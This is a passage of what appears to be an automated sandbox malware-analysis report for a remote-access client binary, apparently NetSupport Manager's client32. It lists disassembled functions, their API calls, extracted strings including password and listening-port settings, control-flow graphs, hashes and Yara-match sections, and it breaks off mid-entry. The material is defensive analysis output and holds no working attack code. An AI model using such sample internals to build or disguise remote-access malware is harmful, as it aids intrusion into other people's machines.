                                                                                • GetProcAddress.KERNEL32(00000000,CipherServer_GetInfoBlock), ref: 11086AFD
                                                                                • GetProcAddress.KERNEL32(?,CipherServer_OpenSession), ref: 11086B0E
                                                                                • GetProcAddress.KERNEL32(?,CipherServer_CloseSession), ref: 11086B1F
                                                                                • GetProcAddress.KERNEL32(00000000,CipherServer_EncryptBlocks), ref: 11086B30
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$LibraryLoad$FileModuleName
                                                                                • String ID: CipherServer_CloseSession$CipherServer_Create$CipherServer_DecryptBlocks$CipherServer_Destroy$CipherServer_EncryptBlocks$CipherServer_GetInfoBlock$CipherServer_GetRandomData$CipherServer_OpenSession$CipherServer_ResetSession$CryptPak.dll
                                                                                • API String ID: 2201880244-3035937465
                                                                                • Opcode ID: ae871db5d7610564588830e50a3b7e849eec5d3f4cd297b35e657d5bd847a740
                                                                                • Instruction ID: dace89b413b7c80efca81dff4c2248eaeba40c207e9952549beb6cb8df15ad3c
                                                                                • Opcode Fuzzy Hash: ae871db5d7610564588830e50a3b7e849eec5d3f4cd297b35e657d5bd847a740
                                                                                • Instruction Fuzzy Hash: 6551D174A043499BD710DF7ADC80AA6FBE8AF54308B1685AED889C7684DB71E844CF54
                                                                                Function 11142400 Relevance: 37.4, APIs: 3, Strings: 18, Instructions: 677registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 111424BA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Close
                                                                                • String ID: Add [%s]%s=%s$Chg [%s]%s=%s$Client$Del [%s]%s=%s$IKS.LIC$Info. Lockup averted for AD policy changes$Info. Policy changed - re-initui$Info. Policy changed - reload transports...$IsA()$NSA.LIC$NSM.LIC$RoomSpec$TracePolicyChange$Warning. Can't calc AD policy changes$_debug$client$client.$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                • API String ID: 3535843008-1834795898
                                                                                • Opcode ID: 9d3d061c5af9482e31b63a56b579fcc6e38a324d7f7f34a6741c6d34e12f4a18
                                                                                • Instruction ID: 10cc70918df64a5c5cf34de13f95fa07aae05e5e56373ca92022ad8c72469b22
                                                                                • Opcode Fuzzy Hash: 9d3d061c5af9482e31b63a56b579fcc6e38a324d7f7f34a6741c6d34e12f4a18
                                                                                • Instruction Fuzzy Hash: 69420874E002699FEB11CB60DD50FEEFB75AF95708F1040D8D909A7681EB72AAC4CB61
                                                                                Function 11074CD0 Relevance: 33.5, APIs: 13, Strings: 6, Instructions: 294threadtimeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                • InitializeCriticalSection.KERNEL32(0000000C,?,?), ref: 11074DB5
                                                                                • InitializeCriticalSection.KERNEL32(00000024,?,?), ref: 11074DBB
                                                                                • InitializeCriticalSection.KERNEL32(0000003C,?,?), ref: 11074DC1
                                                                                • InitializeCriticalSection.KERNEL32(0000DB1C,?,?), ref: 11074DCA
                                                                                • InitializeCriticalSection.KERNEL32(00000054,?,?), ref: 11074DD0
                                                                                • InitializeCriticalSection.KERNEL32(0000006C,?,?), ref: 11074DD6
                                                                                • _strncpy.LIBCMT ref: 11074E38
                                                                                • ExpandEnvironmentStringsA.KERNEL32(?,?,00000100,?,?,?,?,?,?,?), ref: 11074E9F
                                                                                • CreateThread.KERNEL32(00000000,00004000,Function_00070F90,00000000,00000000,?), ref: 11074F3C
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 11074F43
                                                                                • SetTimer.USER32(00000000,00000000,000000FA,110641A0), ref: 11074F87
                                                                                • std::exception::exception.LIBCMT ref: 11075038
                                                                                • __CxxThrowException@8.LIBCMT ref: 11075053
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CritiusernitializeSection$CloseCreateEnvironmentException@8ExpandHandleStringsThreadThrowTimer_malloc_memset_strncpystd::exception::exceptionwsprintf
                                                                                • String ID: ..\ctl32\Connect.cpp$DefaultUsername$General$Password$RememberPassword$destroy_queue == NULL
                                                                                • API String ID: 703120326-1497550179
                                                                                • Opcode ID: ab7e60a43ed30bbed14256cc4f133f9afa5d8c2c4f84f2114a22e1cdf39ff5f9
                                                                                • Instruction ID: be8de8c7dcaf1f52642e817c04f951357ea42bbf71f0edf47656a93d7d63f3b4
                                                                                • Opcode Fuzzy Hash: ab7e60a43ed30bbed14256cc4f133f9afa5d8c2c4f84f2114a22e1cdf39ff5f9
                                                                                • Instruction Fuzzy Hash: 0FB1C6B5E40359AFD711CBA4CD84FD9FBF4BB48304F0045A9E64997281EBB0B944CB65
                                                                                Function 11139A70 Relevance: 31.8, APIs: 12, Strings: 6, Instructions: 348windowCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 3062 11139a70-11139a87 3063 11139eb2-11139ec1 call 11162bb7 3062->3063 3064 11139a8d-11139a94 3062->3064 3064->3063 3065 11139a9a-11139aa1 3064->3065 3065->3063 3067 11139aa7-11139aae 3065->3067 3067->3063 3069 11139ab4-11139abb 3067->3069 3069->3063 3070 11139ac1-11139ad1 call 11145c70 3069->3070 3073 11139ad3-11139ada 3070->3073 3074 11139ae0-11139b27 call 1105e820 call 110642e0 3070->3074 3073->3063 3073->3074 3079 11139b35-11139b5e call 1112d860 3074->3079 3080 11139b29-11139b30 3074->3080 3083 11139b64-11139b67 3079->3083 3084 11139c1a-11139c21 call 110ea860 3079->3084 3080->3079 3085 11139b75 3083->3085 3086 11139b69-11139b6e 3083->3086 3093 11139c23-11139c3e call 1105e820 3084->3093 3094 11139c40-11139c4f PostMessageA 3084->3094 3089 11139b7b-11139b86 3085->3089 3086->3085 3088 11139b70-11139b73 3086->3088 3088->3089 3091 11139b88 3089->3091 3092 11139b8d-11139ba5 3089->3092 3091->3092 3104 11139c01-11139c08 3092->3104 3105 11139ba7-11139bad 3092->3105 3093->3094 3095 11139c55-11139c5a 3093->3095 3094->3095 3098 11139c65-11139c69 3095->3098 3099 11139c5c-11139c60 call 11110000 3095->3099 3102 11139c6b-11139c73 3098->3102 3103 11139c8d-11139cb6 call 11131320 call 11147ad0 call 1112da60 call 11162777 3098->3103 3099->3098 3108 11139c75-11139c8b 3102->3108 3109 11139cb9-11139cc1 3102->3109 3103->3109 3106 11139c17 3104->3106 3107 11139c0a-11139c11 call 11132990 3104->3107 3111 11139baf-11139bb4 3105->3111 3112 11139bfc 3105->3112 3106->3084 3107->3106 3125 11139c13 3107->3125 3108->3109 3113 11139cc3-11139cdd call 11162777 call 11162bb7 3109->3113 3114 11139cde-11139d04 call 11143a50 call 11147af0 SetWindowTextA 3109->3114 3111->3112 3117 11139bb6-11139bbb 3111->3117 3112->3104 3138 11139d10-11139d29 call 11162777 * 2 3114->3138 3139 11139d06-11139d0d call 111361c0 3114->3139 3117->3112 3123 11139bbd-11139bdf 3117->3123 3123->3112 3133 11139be1-11139bf0 call 11146710 3123->3133 3125->3106 3145 11139bf2-11139bfa 3133->3145 3149 11139d2b-11139d2f 3138->3149 3150 11139d6e-11139d72 3138->3150 3139->3138 3145->3112 3145->3145 3153 11139d43-11139d4a 3149->3153 3154 11139d31-11139d41 call 111361c0 3149->3154 3151 11139d78-11139d7a 3150->3151 3152 11139e3c-11139e3e 3150->3152 3155 11139d9c-11139da9 call 110f8b70 3151->3155 3156 11139d7c-11139d7e 3151->3156 3158 11139e40-11139e42 3152->3158 3159 11139e5d-11139e6a call 110f8b70 3152->3159 3160 11139d64 3153->3160 3161 11139d4c-11139d61 call 11132120 3153->3161 3154->3153 3154->3161 3177 11139eaf-11139eb1 3155->3177 3179 11139daf-11139dc0 IsWindowVisible 3155->3179 3156->3155 3162 11139d80-11139d90 call 111361c0 3156->3162 3166 11139e53-11139e5a call 11132120 3158->3166 3167 11139e44-11139e4e call 111361c0 3158->3167 3159->3177 3178 11139e6c-11139e7c IsWindowVisible 3159->3178 3160->3150 3161->3160 3162->3155 3181 11139d92-11139d99 call 11132120 3162->3181 3166->3159 3167->3166 3177->3063 3178->3177 3182 11139e7e-11139e89 IsWindowVisible 3178->3182 3179->3177 3183 11139dc6-11139dd6 call 11145c70 3179->3183 3181->3155 3182->3177 3185 11139e8b-11139ead EnableWindow call 11132120 EnableWindow 3182->3185 3183->3177 3191 11139ddc-11139df4 GetForegroundWindow IsWindowVisible 3183->3191 3185->3177 3192 11139e01-11139e0d call 11132120 3191->3192 3193 11139df6-11139dff EnableWindow 3191->3193 3196 11139e0f-11139e15 3192->3196 3197 11139e1e-11139e3b EnableWindow call 11162bb7 3192->3197 3193->3192 3196->3197 3198 11139e17-11139e18 SetForegroundWindow 3196->3198 3198->3197
                                                                                APIs
                                                                                  • Part of subcall function 11145C70: GetVersionExA.KERNEL32(111F1EF0,76968400), ref: 11145CA0
                                                                                  • Part of subcall function 11145C70: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
                                                                                  • Part of subcall function 11145C70: _memset.LIBCMT ref: 11145CFD
                                                                                  • Part of subcall function 11145C70: _strncpy.LIBCMT ref: 11145DCA
                                                                                • PostMessageA.USER32(00040310,000006CF,00000007,00000000), ref: 11139C4F
                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                • SetWindowTextA.USER32(00040310,00000000), ref: 11139CF7
                                                                                • IsWindowVisible.USER32(00040310), ref: 11139DBC
                                                                                • GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,00000000), ref: 11139DDC
                                                                                • IsWindowVisible.USER32(00040310), ref: 11139DEA
                                                                                • SetForegroundWindow.USER32(00000000), ref: 11139E18
                                                                                • EnableWindow.USER32(00040310,00000001), ref: 11139E27
                                                                                • IsWindowVisible.USER32(00040310), ref: 11139E78
                                                                                • IsWindowVisible.USER32(00040310), ref: 11139E85
                                                                                • EnableWindow.USER32(00040310,00000000), ref: 11139E99
                                                                                • EnableWindow.USER32(00040310,00000000), ref: 11139DFF
                                                                                  • Part of subcall function 11132120: ShowWindow.USER32(00040310,00000000,?,11139EA2,00000007,?,?,?,?,?,00000000), ref: 11132144
                                                                                • EnableWindow.USER32(00040310,00000001), ref: 11139EAD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Window$EnableVisible$Foreground$MessageOpenPostShowTextVersion__wcstoi64_memset_strncpy
                                                                                • String ID: Client$ConnectedText$HideWhenIdle$LockedText$ShowUIOnConnect$ViewedText
                                                                                • API String ID: 3453649892-3803836183
                                                                                • Opcode ID: 77f0fc716c5108730fe3721f30b933414b82ace8a427d74df6603177c94951ec
                                                                                • Instruction ID: ba9ac0b981c1f0862d5fa69d940274f40709b6541bdede94fe31ed47de48390e
                                                                                • Opcode Fuzzy Hash: 77f0fc716c5108730fe3721f30b933414b82ace8a427d74df6603177c94951ec
                                                                                • Instruction Fuzzy Hash: 64C12B75A1127A9BEB11DBE0CD81FAAF766ABC032DF040438E9159B28CF775E444C791
                                                                                Function 110305F5 Relevance: 31.6, APIs: 5, Strings: 13, Instructions: 149windowCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 3201 110305f5-110305fc 3202 11030600-11030610 3201->3202 3202->3202 3203 11030612-11030619 3202->3203 3204 1103061b-1103062d 3203->3204 3205 1103065d 3203->3205 3209 11030650-11030657 3204->3209 3210 1103062f-1103064e wsprintfA 3204->3210 3206 11030662-1103067d call 1105e820 3205->3206 3212 11030703-1103071d call 1102a520 call 11139600 call 11145c70 3206->3212 3213 11030683-11030693 call 11145c70 3206->3213 3209->3205 3209->3212 3210->3206 3226 1103071f-11030726 3212->3226 3227 1103075e-11030765 3212->3227 3213->3212 3219 11030695-110306ce call 1105e820 call 111101b0 3213->3219 3231 110306e1 3219->3231 3232 110306d0-110306df call 1109dd30 3219->3232 3229 11030776-110307a1 call 110286c0 call 1102d190 PostMessageA 3226->3229 3230 11030728-1103072f 3226->3230 3227->3229 3233 11030767-1103076f call 11143a20 3227->3233 3249 110307a3-110307ad PostMessageA 3229->3249 3250 110307af-110307ca 3229->3250 3230->3233 3237 11030731-11030756 call 1105e820 3230->3237 3236 110306e3-110306fe call 1109e5b0 3231->3236 3232->3236 3233->3229 3244 11030771 call 1102d830 3233->3244 3236->3212 3237->3227 3244->3229 3249->3250 3252 110307d8-110307f3 3250->3252 3253 110307cc-110307d6 PostMessageA 3250->3253 3255 11030801-1103081f call 11147060 call 11027810 call 1102d900 3252->3255 3256 110307f5-110307ff PostMessageA 3252->3256 3253->3252 3262 1103081f call 1102d900 3255->3262 3256->3255
                                                                                APIs
                                                                                • wsprintfA.USER32 ref: 11030645
                                                                                • PostMessageA.USER32(NSMWControl32,00000000,Default,UseIPC,00000001,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 11030797
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MessagePostwsprintf
                                                                                • String ID: *ListenPort$Client$Default$Global\NSMWClassAdmin$NSMWClass$NSMWControl32$NSSWControl32$NSTWControl32$Ready$TCPIP$TraceIPC$UseIPC$_debug
                                                                                • API String ID: 875889313-3431570279
                                                                                • Opcode ID: 52e4332a4f1a6695b503962eca77932fd89c869ac73ece535db52d27cb53eafb
                                                                                • Instruction ID: 917d364d5c6b0b603fb0f9ba81c7ab37e2e4bb2b49ece13a51dcd12a3dfde8f6
                                                                                • Opcode Fuzzy Hash: 52e4332a4f1a6695b503962eca77932fd89c869ac73ece535db52d27cb53eafb
                                                                                • Instruction Fuzzy Hash: C251FC74F42366AFE712CBE0CC55F69F7957B84B0CF200064E6156B6C9DAB0B540CB95
                                                                                Function 110310D5 Relevance: 30.1, APIs: 9, Strings: 8, Instructions: 315COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetNativeSystemInfo.KERNEL32(?), ref: 110310D9
                                                                                • GetStockObject.GDI32(0000000D), ref: 110312E6
                                                                                • GetObjectA.GDI32(00000000,0000003C,?), ref: 110312F6
                                                                                • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 11031334
                                                                                • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 1103133A
                                                                                • InterlockedExchange.KERNEL32(012F8D80,00001388), ref: 110313BA
                                                                                • GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 110313EC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorModeObject$ExchangeInfoInterlockedNativeStockSystem
                                                                                • String ID: .%d$Error %s unloading audiocap dll$j0U$pcicl32$&$*$j$
                                                                                • API String ID: 1428277488-3745656997
                                                                                • Opcode ID: 7ab4675b5621614b5560d1b38db1ee70649d60d135089b240ffcc9cb50bab512
                                                                                • Instruction ID: bbabce5d96ec2c90806d5611ae465d21da0aa0097d7318abfc1e6149708f9681
                                                                                • Opcode Fuzzy Hash: 7ab4675b5621614b5560d1b38db1ee70649d60d135089b240ffcc9cb50bab512
                                                                                • Instruction Fuzzy Hash: 60C137B0E162759EDF02CBF48C847DDFAF4AB8830CF0445BAE855A7285EB715A80C752
                                                                                Function 110310AC Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 249COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                • GetStockObject.GDI32(0000000D), ref: 110312E6
                                                                                • GetObjectA.GDI32(00000000,0000003C,?), ref: 110312F6
                                                                                • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 11031334
                                                                                • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 1103133A
                                                                                • InterlockedExchange.KERNEL32(012F8D80,00001388), ref: 110313BA
                                                                                • GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 110313EC
                                                                                • _sprintf.LIBCMT ref: 11031401
                                                                                • _setlocale.LIBCMT ref: 1103140B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorModeObject$ExchangeInterlockedStock_malloc_memset_setlocale_sprintfwsprintf
                                                                                • String ID: .%d$Error %s unloading audiocap dll$j0U$pcicl32$&$*$j$
                                                                                • API String ID: 4242130455-3745656997
                                                                                • Opcode ID: 9ce7f7efe95e834453681c4923fbfa899ecbeaf8ae4f254e48ac6de1b4bac228
                                                                                • Instruction ID: e9c6acc14f93b40a3e0eb8b8fbec85b26532d2932113fe6213d234842048e606
                                                                                • Opcode Fuzzy Hash: 9ce7f7efe95e834453681c4923fbfa899ecbeaf8ae4f254e48ac6de1b4bac228
